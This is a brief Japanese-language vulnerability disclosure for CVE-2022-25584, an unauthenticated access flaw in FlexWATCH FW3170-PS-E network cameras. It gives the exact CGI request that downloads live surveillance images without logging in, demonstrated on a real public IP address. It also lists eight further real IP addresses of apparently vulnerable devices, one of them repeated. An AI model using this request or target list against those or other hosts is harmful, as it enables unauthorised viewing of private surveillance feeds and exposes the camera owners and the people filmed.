
Flexwatch-CVE
Flexwatch-CVE
このドキュメントは CVE-2022-25584 "RESERVED" に関するものです。
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-25584

この脆弱性はCNVDに登録されていますが、まだ公開されていません。
CNVD ID:CNVD-2021-103443

脆弱性の再現:
Seyeon Tech Co., Ltd. 製の FlexWATCH FW3170-PS-E Network Video System 4.23-3000_GY に未認証アクセス脆弱性があることを発見しました。攻撃者はこれを悪用して監視画像を取得し、機密情報を漏洩させる可能性があります。
例:
http://211.174.227.102:10001/app/multi/single.asp

次に、以下のURLにアクセスします:http://211.174.227.102:10001/cgi-bin/fwcamimgsave.cgi?FwModId=0&PortId=0&FwCgiVer=0x0001
監視リアルタイム画面をダウンロード


会社公式サイト:http://www.flexwatch.com/
その他の事例:
http://211.240.10.38:10001/app/multi/single.asp
http://121.133.21.35:10001/app/multi/single.asp
http://210.223.145.159:10001/app/multi/single.asp
http://115.142.194.178:10001/app/multi/single.asp
http://115.142.194.178:10001/app/multi/single.asp
http://27.1.124.18:10001/app/multi/single.asp
http://183.100.61.196:10001/app/multi/single.asp
http://118.176.196.247:10001/app/multi/single.asp